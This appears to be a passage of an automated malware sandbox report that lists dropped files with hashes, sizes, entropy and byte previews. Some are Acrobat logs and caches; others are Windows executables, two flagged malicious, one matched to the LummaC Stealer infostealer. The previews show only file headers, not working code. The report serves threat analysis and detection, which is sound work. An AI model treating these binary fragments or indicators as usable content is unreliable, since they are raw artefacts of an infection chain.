                                                                                                              SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                                              Malicious:false
                                                                                                              Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):15114
                                                                                                              Entropy (8bit):5.366796125832939
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:Ry23OSL+H3YIZUpWPQTFScJJClWr5+5xYPseKskUeK9KkJur1D+EtG4cBchUm9x/:m5qgCI
                                                                                                              MD5:5CEC417D6A4AFD530DB2A868A83BF7CA
                                                                                                              SHA1:015D4AF48F5DBB57369BB3351024086E81F0686C
                                                                                                              SHA-256:B75DC759EF720FF8A907E69CAD6F3A5EFF4EC9E9703B96CAFF7EA10B604B0A67
                                                                                                              SHA-512:4AD0898E3CA9B4C7A19AAE1AEC69FFFE4B352CA5B4C952FAA236CECF09DEB4D879DD2E1677C31B523C9AFFA04E770EDCEF008CFD3063196F0F9AFC5D52CCA725
                                                                                                              Malicious:false
                                                                                                              Preview:SessionID=ccfcb671-bf92-47ce-aee6-9901b450c632.1734336859731 Timestamp=2024-12-16T03:14:19:731-0500 ThreadID=7372 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=ccfcb671-bf92-47ce-aee6-9901b450c632.1734336859731 Timestamp=2024-12-16T03:14:19:732-0500 ThreadID=7372 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=ccfcb671-bf92-47ce-aee6-9901b450c632.1734336859731 Timestamp=2024-12-16T03:14:19:732-0500 ThreadID=7372 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=ccfcb671-bf92-47ce-aee6-9901b450c632.1734336859731 Timestamp=2024-12-16T03:14:19:732-0500 ThreadID=7372 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=ccfcb671-bf92-47ce-aee6-9901b450c632.1734336859731 Timestamp=2024-12-16T03:14:19:732-0500 ThreadID=7372 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):29752
                                                                                                              Entropy (8bit):5.397379909051788
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rZ:G//zQD2zOCcOqji0zvXqldxHuWwss0Jm
                                                                                                              MD5:67B6A48D347251E234B1E2DC8F27530E
                                                                                                              SHA1:26F13012915B23C78EFEDA4FC3AB8B6E7272528B
                                                                                                              SHA-256:807BCC051802B80C623F5683EE6C797E403F62BB63218A2B3B1369F0C6AEDF8C
                                                                                                              SHA-512:6FB0FEBFF7F85892F082BB90725ED81EDB972B942586A451C2091D98AFE1EEA9FD766200F4DD9FBE1622BD6A135F54363EA4F70F40DA688DD228BFD6270FBD17
                                                                                                              Malicious:false
                                                                                                              Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1419751
                                                                                                              Entropy (8bit):7.976496077007677
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:/xA7owWLcGZtwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLcGZtwZGk3mlind9i4ufFXpAXkru
                                                                                                              MD5:A46246FAEAB95D87F5B4FE236C2B3D3E
                                                                                                              SHA1:7F018DB9238A63FEAD8D11A92297E7366058A75A
                                                                                                              SHA-256:7E822FECC47177C5A7F4C250E7D53509D104DE68B0D0CE9445877B508400988E
                                                                                                              SHA-512:8AAB79958BF39F014FBA7F69287FE0C357746E63FA3482DE3231BDF4A97B964A0815DAF7BFE9751C55BA6BE618E0A964CEB23FC30B4FA9DFEB284F42EBA897BF
                                                                                                              Malicious:false
                                                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                              Category:dropped
                                                                                                              Size (bytes):386528
                                                                                                              Entropy (8bit):7.9736851559892425
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                              Malicious:false
                                                                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                              Category:dropped
                                                                                                              Size (bytes):758601
                                                                                                              Entropy (8bit):7.98639316555857
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                              MD5:3A49135134665364308390AC398006F1
                                                                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                              Malicious:false
                                                                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1407294
                                                                                                              Entropy (8bit):7.97605879016224
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                              MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                              SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                              SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                              SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                              Malicious:false
                                                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):300544
                                                                                                              Entropy (8bit):6.8710968776250505
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:U7OrQ0hUFver4GaPojyx+Vvb7hY4Vivdd9Y718z:GgCeUGa2Evdd9k18z
                                                                                                              MD5:7ACC498C8D53353363A5A9CD9A01599F
                                                                                                              SHA1:1362143B342FBF303DF190298C02D18672F91889
                                                                                                              SHA-256:84827B2B4784E78C8FA39F9EAF66AF5D579EFC96107F9763CB0786AD69F547C1
                                                                                                              SHA-512:8D67755DE73CB827480E6C1344A42A1D8D4716C24102F690DB01DE3E853F6BABAE20CD95AA9E97382DDEF3DF2F5C6896C1C282C17A0503631EEA3E0BB72A46F7
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: C:\Users\user\AppData\Local\Temp\ryuvnp, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....!V..........................................@.......................................@.................................................................. ...9..................................................,................................text............................... ..`.rdata... ......."..................@..@.data............P..................@....CRT.................B..............@..@.reloc...9... ...:...D..............@..Bnfrkk.... ...`.......~..............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3082476
                                                                                                              Entropy (8bit):7.942187420365579
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:sfU4UjEXzJK3Ecgbh2h39tV9oChSkJ0h37Hfan8oO9obENintSHdhQxnMZkPV:sfUbYXzJqoh21Rmx/uLTDngKxh
                                                                                                              MD5:EAE347B707607585B09FF0515E84087C
                                                                                                              SHA1:7D40A7154DA56584AF72412CF8DF836FEE553231
                                                                                                              SHA-256:28E81F29AD7E980AB13E22E05D19C2A67D75B5448E2F3A41C094B573F8B74598
                                                                                                              SHA-512:749C3AE365AAB6273D070726CAB90AF0FF663D4DCFCC7DCC1831E0377D470D95F6D61472312169DF15659A26505BA3AE99AD50D43A5578FA4324ED26B64CF7B4
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@..............................................:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc....:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:PDF document, version 1.7, 2 pages
                                                                                                              Category:dropped
                                                                                                              Size (bytes):114905
                                                                                                              Entropy (8bit):7.668231614662199
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:jeoHTJykCVHX9YGQ9eet/vXZ7bBLZ/YOoEGs4Ga4L8/3F9q0a5wi0sbgQa6:yoH9e9YGBUwi0a54sbW6
                                                                                                              MD5:E6CA828043E98DD4CAF25C734E02B125
                                                                                                              SHA1:A557D937514A1430246D18D73EB32DFEF96851E3
                                                                                                              SHA-256:AA395834597F348B15C4A7A4FCFDBD28EB92A0A2D34AFE67AD8EB3E1E43E812C
                                                                                                              SHA-512:D6F470229AFF27285D6F0579958F7911095D942B11F97037E14170FB178874C34B8631BB1995943326B872934B457A2484E96AB1B7F85F972D0712DF26C6708E
                                                                                                              Malicious:false
                                                                                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 18 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/ViewerPreferences 147 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 15 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</XObject<</Image5 5 0 R>>/ExtGState<</GS7 7 0 R/GS10 10 0 R>>/Font<</F1 8 0 R/F2 11 0 R/F3 13 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.25 842] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 9352>>..stream..x..][s..~W....7r+<..N.V*U.%;Z.^....>P.D).HG..*..<.7.S....9g8...1.a....}.....h.....?...._<}......._l.|...^........j[U..V.1.V.M...w.......?7....m...Vo.KG..q.....{.....+.y|....{.'_...<x.....Z=.............[:"<BWU.u.i.....G~.}../.F......SH..M..>.}.6..C_=W..Um.......n......._ ..3..(.>YVo........R...m....\u.....W...>?....#....ss...=.W^..............3.k..n..E..^...%q...&..j.6.....Hw@.
                                                                                                              Process:C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):653952
                                                                                                              Entropy (8bit):6.885961951552677
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                              MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                              SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                              SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
                                                                                                              SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: upgrade.hta, Detection: malicious, Browse
                                                                                                              • Filename: file.ps1, Detection: malicious, Browse
                                                                                                              • Filename: bUAmCazc.ps1, Detection: malicious, Browse
                                                                                                              • Filename: KBKHHYI29L.msi, Detection: malicious, Browse
                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                              • Filename: evhopi.ps1, Detection: malicious, Browse
                                                                                                              • Filename: 9nobq4rqr0.exe, Detection: malicious, Browse
                                                                                                              • Filename: Rechnung0192839182.pdf, Detection: malicious, Browse
                                                                                                              • Filename: tera10.zip, Detection: malicious, Browse
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):785809
                                                                                                              Entropy (8bit):7.8961399536577455
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:U7+7mOB4HOu13QO9CviA3N4AS2HCczmxq9q4SZGmxB9i8k/yHUhyCLl:U7amOBfu1b9CviA82icis9yZhkbsal
                                                                                                              MD5:43341E3555F6556A2903517C245FDDB1
                                                                                                              SHA1:20F493333103CE83D21A72D8AED9FF7EC835626F
                                                                                                              SHA-256:00711B19D0EC268E1816F3661AA9ABCD38E4D0F990CB464136BB3E1FCEBCBECF
                                                                                                              SHA-512:3DA8E93C4AD6112535A8AA8C440E3D03F3AC2EEF248FB171EE3830093AA9293749CF79474DA9965EF7F25415B7BE9A8AB1BAD3BD3099E06B9581DCE465C2BEA7
                                                                                                              Malicious:false
                                                                                                              Preview:xM...I.wF.R..q.....LW...Fd....^.....y......q....eRF.jB..hA.E.bR..a.lvl....vN..GY.^.FEQ.S..r....WX.\.XO...uvt.xF.B.fIy[UjH.f.^T.l.tn..l..An.p..T.G..F.dND[Vq.dvk.LHM_Aq.iK..hG[FBoq.aIW.v.e.U.E..hUO..h^.I\.Lp..IO.IMGZ..F.UD.F...j...m.lC.f.u.m...J..NJY.UdT..f.o.H....M.T.tB.v..cA..BW..vB.Wd..ph....n.....qi.A.kH..cMtU...gwyYD.B].]....A.Y...W..I`vx.Jt.XO...f..D.p..nU..P..xC..V.KJe.[.Lo._....`i.g..AMciN..C...NoatDm..^deI...._..KIxVyD..l...Z.B..Mj.......e.I.S.pAGU.K.`W.....\.hW..ov..x..Y.h...N._v.n...bu..X..D..P.F.Z...OX.EL.I[uZ..ceN.t.r.wca..f_...lh^..x.r.l.wT.lHU.Wcx.X.......NE...V...NuH..w..tY..m^I..nV.].....PX..C.vDJ.my.xshE..^.TNi.K..NM\yhs.M...i^.gIhG.n.FnjP...^.m..LC.WeQF.\piArPw.....xg.^.^.jD..l.Q..y.HG....v...\e..w.b.J_ELH.u..b..OM`..j....I.....Yy..V..]m.ks.i[.yuAA.tu....AQ.I.JH\.......]t.F.]..Ti.M.FP.`LF.e..`_.U.RRTkT...VuV.gOA.P.iBs.fXW....vlp_....^...XI.`lX.y...U.R..q.s.QDi`w...Q.\Kdu.A....T...i..wxEA...M.ZGF.e....GNC..L.yJAN.....XV....`F^.Tr.RvS.So.V.Irj.o.....u\t.A..`..y...Hr.c...
                                                                                                              Process:C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):29152
                                                                                                              Entropy (8bit):6.656857622778623
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:+yq82Ud7/zfkn8I+ilpd4TILqIgXYoBCH/3hprl:Zq824LfMV4TqqIgXYoBCH/3hpB
                                                                                                              MD5:B6F6C3C38568EE26F1AC70411A822405
                                                                                                              SHA1:5B94D0ADAC4DF2D7179C378750C4E3417231125F
                                                                                                              SHA-256:A73454C7FAD23A80A3F6540AFDB64FC334980A11402569F1986AA39995AE496D
                                                                                                              SHA-512:5C0A5E9A623A942AFF9D58D6E7A23B7D2BBA6A4155824AA8BB94DBD069A8C15C00DF48F12224622EFCD5042B6847C8FB476C43390E9E576C42EFC22E3C02A122
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=...=...=....`.?...#.e.?...#.c.<...#.r.?.......8...=...f...#.u.$...#.b.<...#.g.<...Rich=...................PE..L......I................."...(......a,.......@....@..................................u......................................lB..P....p..@............N...#...........................................A..@............@..x............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......0..............@....rsrc...@....p.......<..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2649600
                                                                                                              Entropy (8bit):6.720396083797047
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:sd0krhjbVYU9U/ElyrLKlvGBO58GBjI9nYM6JBe4PjnhMsQHNClhIdYTf2O+yX3l:lkrRyylvGB652NCMghMtHIledkpX4
                                                                                                              MD5:142993A82414D3FA9C7904947E67A905
                                                                                                              SHA1:B4FAAD4FB70B7B162CC5AA0D0424C97161D7568C
                                                                                                              SHA-256:DB33DD28D3365144495CB84F586E029BBC90A5FC94208A1B206A55B05C1C06DF
                                                                                                              SHA-512:6A1AA960352420C4C583F74F61D93A5A3F3826F3E2BA32B7CDB72EBFF1D28662E30BF41A56FC8CE3559F33AA56C384975D91E0C9C0FE434AC71ADCAAA6F10AF2
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Bu....{...{...{..[...{..l...{..l....{..l....{..l...{...z.<.{..l..{..l...{..l...{..l...{.Rich..{.................PE..L...x..^...........!.........................................................).....\g)...@..........................g!..|...Q!.x....@(. ....................P(..Z.. ................................O!.@............................................text...z........................... ..`.rdata...D.......F..................@..@.data...pC....!..(....!.............@....rsrc... ....@(.......&.............@..@.reloc..~f...P(..h....'.............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48414
                                                                                                              Entropy (8bit):4.708963357337208
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:TBecXfqXf1NYNIInfYgQHny+jIjZqd0VXSFonM1DUZazSyE3e4NTTB:FhXumbjMQSFonM2U38est
                                                                                                              MD5:BD34E124C62C5916C58859BF725D1DFF
                                                                                                              SHA1:4C3A7552AD57433A0F4D38A4527F5B92D6C361A7
                                                                                                              SHA-256:9025D6D49F7E049236639E657A30692E47BBECD826857B90A26DCA637C081CBB
                                                                                                              SHA-512:C0EA564EEFBF96ECD80E1DA5DB649CE2E23199FDDC9CD5BC35A49487F8F65CB1A33FDF9D0FE79BEB417A1F311AB2B3FC134D5E610C26789B9855DF4FE2DC4490
                                                                                                              Malicious:false
